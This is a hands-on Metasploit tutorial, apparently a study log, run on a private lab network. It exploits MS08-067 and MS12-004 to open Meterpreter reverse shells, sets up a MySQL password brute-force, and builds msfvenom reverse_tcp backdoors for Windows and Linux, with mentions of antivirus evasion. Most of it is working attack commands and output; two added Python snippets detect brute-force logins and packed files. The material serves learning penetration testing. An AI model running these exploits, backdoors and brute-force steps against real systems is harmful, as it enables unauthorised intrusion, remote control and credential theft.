Metasploit Advanced


  This article is the written version of "T00LS Metasploit (Season 2)": a personal record made while following the video and practising hands-on, for study only. It covers some basic Metasploit usage, mainly remote code execution, remote code execution through MIDI file parsing, password cracking, and backdoor generation.

1. Remote code execution: MS08-067

  First, we prepared a target machine: 192.168.1.103 [Windows XP Professional]

msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 192.168.1.103
rhost => 192.168.1.103
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
...
【There are many more; they are not all shown here】
...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.103    yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.110    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

  Note that LHOST and LPORT need to be set; by default the listener is the local IP on port 4444, and if you are going after an external IP you need to provide an external IP address for it. Below is a successful run:

MS17-010

  For the MS17-010 exploitation method please see: SMB MS17-010; it is not repeated here.

Remote code execution through MIDI file parsing

  Target machine: 192.168.1.111 (XP); attacker machine: 192.168.1.110 (Kali)

msf exploit(ms08_067_netapi) > search 12-004

Matching Modules
================

   Name                                   Disclosure Date  Rank    Description
   ----                                   ---------------  ----    -----------
   exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflow

msf exploit(ms08_067_netapi) > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  false            no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

  Two important parameters need to be set: SRVHOST (set it to the local address) and SRVPORT (the listening port; the default is fine). There is also URIPATH, a "friendly" access path.

msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.110    【set to the local address】
SRVHOST => 192.168.1.110
msf exploit(ms12_004_midi) > set URIPATH /
URIPATH => /
msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  false            no        Enable JavaScript obfuscation
   SRVHOST    192.168.1.110    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH    /                no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms12_004_midi) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.110:4444 
msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.1.110:8080/      【open this address with IE on the target machine】
[*] Server started.
[*] 192.168.1.111    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.1.111    ms12_004_midi - Sending html to 192.168.1.111:1222...
[*] 192.168.1.111    ms12_004_midi - Request as: Windows-Media-Player/10.00.00.4058
[*] 192.168.1.111    ms12_004_midi - Sending midi corruption file...
[*] 192.168.1.111    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.1.111    ms12_004_midi - Sending midi corruption file...
[*] Sending stage (957487 bytes) to 192.168.1.111
[*] Meterpreter session 3 opened (192.168.1.110:4444 -> 192.168.1.111:1225) at 2017-08-22 10:22:27 -0400
[*] Session ID 3 (192.168.1.110:4444 -> 192.168.1.111:1225) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is iexplore.exe (3300) as: CHINA-5D20EA9B7\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (760)
[+] Successfully migrated to services.exe (760) as: NT AUTHORITY\SYSTEM

  Through the attack process above, a session is obtained successfully.

msf exploit(ms12_004_midi) > sessions    【list sessions】

Active sessions
===============

  Id  Type                     Information                                      Connection
  --  ----                     -----------                                      ----------
  3   meterpreter x86/windows  CHINA-5D20EA9B7\Administrator @ CHINA-5D20EA9B7  192.168.1.110:4444 -> 192.168.1.111:1225 (192.168.1.111)

msf exploit(ms12_004_midi) > sessions -i 3    【-i selects the session】
[*] Starting interaction with 3...

meterpreter > ipconfig                【a meterpreter is obtained successfully】

Password cracking

MySQL password cracking

  Because of limitations of the lab environment, the steps are given first and a sample run will be added later... (Note, from the option descriptions in the listing below: PASS_FILE takes one password per line, whereas USERPASS_FILE expects "user password" pairs, one pair per line.)

msf > search mysql_login      [MySQL login authentication]

Matching Modules
================

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   auxiliary/scanner/mysql/mysql_login                   normal  MySQL Login Utility

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > cat /root/pass.txt      [view the password dictionary]
[*] exec: cat /root/pass.txt

aaa
bbb
ccc
ddd
123456
qwerty
admin
passwd
haha
helloworld
msf auxiliary(mysql_login) > set USERPASS_FILE /root/pass.txt    [set the password dictionary file]
USERPASS_FILE => /root/pass.txt
msf auxiliary(mysql_login) > set threads 10               [set the number of threads]
threads => 10
msf auxiliary(mysql_login) > run
...

Because some small problems came up during the brute-force run, the result is not given for now...
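A defender-side complement to the brute-force module above, added here as an example that is not part of the original article: a run of mysql_login with ten threads leaves a tight burst of failed logins in the database server's log, and counting those failures per source host and user inside a sliding time window is the simplest way to flag it. The sample lines are constructed in the style of a MySQL 5.7 error log (it is assumed that "Access denied" notes are being written to that log, which depends on the server's error-log verbosity setting); the regex, thresholds and function names are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the style of a MySQL 5.7 error log (not taken from the article).
# Eight failures for root from one host arrive within a second, as a threaded guessing
# run would produce; two failures for 'app' from another host are minutes apart.
SAMPLE_LOG = """\
2017-08-23T03:39:00.000000Z 9 [Note] Access denied for user 'app'@'192.168.1.50' (using password: YES)
2017-08-23T03:41:20.100000Z 12 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.200000Z 13 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.300000Z 14 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.400000Z 15 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.500000Z 16 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.600000Z 17 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.700000Z 18 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:20.800000Z 19 [Note] Access denied for user 'root'@'192.168.1.110' (using password: YES)
2017-08-23T03:41:21.000000Z 20 [Note] Aborted connection 20 to db: 'unconnected' user: 'unauthenticated' host: '192.168.1.110' (Got an error reading communication packets)
2017-08-23T03:45:00.000000Z 21 [Note] Access denied for user 'app'@'192.168.1.50' (using password: YES)
"""

# Matches only the authentication-failure notes; other [Note] lines are ignored.
ACCESS_DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+)Z \d+ \[Note\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
)


def parse_failures(log_text):
    """Return (timestamp, source_host, user) for every 'Access denied' line."""
    events = []
    for line in log_text.splitlines():
        m = ACCESS_DENIED.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%f")
            events.append((ts, m.group("host"), m.group("user")))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window failure count per (host, user).

    Returns {(host, user): (first_ts, alert_ts, failures_in_window)} for every pair
    that reached `threshold` failures within `window_seconds`; a pair alerts once.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(list)
    alerts = {}
    for ts, host, user in sorted(events):
        key = (host, user)
        bucket = recent[key]
        bucket.append(ts)
        while ts - bucket[0] > window:   # drop failures that fell out of the window
            bucket.pop(0)
        if len(bucket) >= threshold and key not in alerts:
            alerts[key] = (bucket[0], ts, len(bucket))
    return alerts


if __name__ == "__main__":
    for (host, user), (first, last, n) in detect_bruteforce(parse_failures(SAMPLE_LOG)).items():
        print(f"ALERT: {n} failed logins for {user!r} from {host} between {first} and {last}")
```

With the defaults, only root from 192.168.1.110 is reported; the two failures for app from 192.168.1.50 are six minutes apart and only become an alert if the window is widened to cover them, which is the knob that trades detection of slow guessing against false positives from users who mistype a password.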

 

Backdoors

  To generate all kinds of backdoors, see: msfvenom commands for generating all kinds of payloads

Windows exe backdoor

  The following introduces the use of a Windows backdoor. Attacker machine: 192.168.1.107 (Kali); target machine: 192.168.1.111 (Win XP)

  First, generate the backdoor, using windows/meterpreter/reverse_tcp as the example:

[email protected]:~# msfconsole
                                                  
     IIIIII    dTb.dTb        _.---._
       II     4'  v  'B   .'"".'/|\`.""'.
       II     6.     .P  :  .' / | \ `.  :
       II     'T;. .;P'  '.'  /  |  \  `.'
       II      'T; ;P'    `. /   |   \ .'
     IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.1.107 LPORT=1234 -f exe > ./test.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.1.107 LPORT=1234 -f exe > ./test.exe

No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes

  We can see that the backdoor above calls back to the attacker machine's IP, 192.168.1.107, on port 1234. After generating the backdoor, place it on the target machine 192.168.1.111 and run the following on the attacker machine:

msf > use exploit/multi/handler 
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp        【the same payload as the backdoor just generated】
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set lhost 192.168.1.107      [set the reverse-connection IP]
lhost => 192.168.1.107
msf exploit(handler) > set lport 1234            [set the reverse-connection port]
lport => 1234
msf exploit(handler) > run                   [after run, execute the backdoor test.exe on the Win XP target]

[*] Started reverse TCP handler on 192.168.1.107:1234 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.1.111
[*] Meterpreter session 1 opened (192.168.1.107:1234 -> 192.168.1.111:1470) at 2017-08-23 03:41:20 -0400

meterpreter > ipconfig

  This gives us a meterpreter, and from there it is up to you. The run is shown below:

To learn more about generating Windows backdoors with msfvenom, see the two links below:
[Translated] msfvenom

[Original] Getting a shell with an exe backdoor trojan generated by MSFVenom

Linux backdoor

  The following is a brief demonstration of a Linux backdoor. Attacker machine: 192.168.1.107 (Kali); target machine: 192.168.1.103 (Ubuntu 16.04)

  First generate the Linux backdoor, linux/x86/meterpreter/reverse_tcp, on Kali as follows:

msf > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4321 -f elf > shell.elf
[*] exec: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4321 -f elf > shell.elf

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 99 bytes
Final size of elf file: 183 bytes
msf > chmod 777 shell.elf        [grant execute permission]
[*] exec: chmod 777 shell.elf

  Copy the generated backdoor to the target machine 192.168.1.103, then run the following on the attacker machine 192.168.1.107:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.107      [set the local IP]
LHOST => 192.168.1.107
msf exploit(handler) > set LPORT 4321            [set the listening port]
LPORT => 4321
msf exploit(handler) > run                   [after run, execute the backdoor shell.elf on the target]

[*] Started reverse TCP handler on 192.168.1.107:4321 
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.107:4321 -> 192.168.1.103:39498) at 2017-08-23 04:33:08 -0400

meterpreter > ifconfig                     [a meterpreter is obtained]

  The rest is up to you; below is the run:

  Other backdoors are not covered for now; refer to the earlier link, msfvenom commands for generating all kinds of payloads, and combine it with the two samples above, which should be enough. I will add more when there is time.

  The backdoor part is not only about generating a simple backdoor; the backdoor should also have anti-virus evasion properties. msfvenom can encode the payload while generating the backdoor, and packing tools can also be applied to improve stealth.
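On the defensive side of the last paragraph, added here as an example that is not code from the article: encoding a payload or packing the executable, as described above, removes the low-entropy structure of ordinary code and data, so a per-chunk Shannon-entropy check is a common first-pass triage signal for such files. The buffers are constructed stand-ins (seeded pseudo-random bytes for an encoded section, repeated English text for a plain one, zeros for padding); the threshold, chunk size and function names are my own assumptions, and high entropy alone is only a hint, since compressed resources and key material look the same.

```python
import math
import random
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or single-valued input, approaching 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data, chunk_size=1024):
    """Entropy of each consecutive chunk, so a single high-entropy region stands out among plain ones."""
    return [shannon_entropy(data[i:i + chunk_size]) for i in range(0, len(data), chunk_size)]


def looks_packed(data, threshold=7.0, min_fraction=0.5, chunk_size=1024):
    """Triage heuristic: True when at least `min_fraction` of the chunks reach `threshold` bits/byte."""
    entropies = chunk_entropies(data, chunk_size)
    if not entropies:
        return False
    high = sum(1 for e in entropies if e >= threshold)
    return high / len(entropies) >= min_fraction


# Constructed samples (not real binaries): a seeded pseudo-random buffer stands in for an
# encoded or packed section, repeated English text for an unencoded one, zeros for padding.
_rng = random.Random(1234)
RANDOM_LIKE = bytes(_rng.randrange(256) for _ in range(4096))
PLAIN_TEXT = (b"The quick brown fox jumps over the lazy dog. " * 100)[:4096]
ZERO_PADDING = bytes(4096)
MIXED = PLAIN_TEXT + RANDOM_LIKE   # half plain, half high-entropy


if __name__ == "__main__":
    for name, buf in [("random-like", RANDOM_LIKE), ("plain text", PLAIN_TEXT),
                      ("zero padding", ZERO_PADDING), ("mixed", MIXED)]:
        print(f"{name:12s} entropy={shannon_entropy(buf):.2f} packed={looks_packed(buf)}")
```

Chunking matters more than the whole-file figure: a small encoded stub appended to a large ordinary program barely moves the overall entropy, but shows up as one or two chunks near 8 bits, which is why the decision is made on the fraction of high-entropy chunks rather than on a single number.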


To be continued...
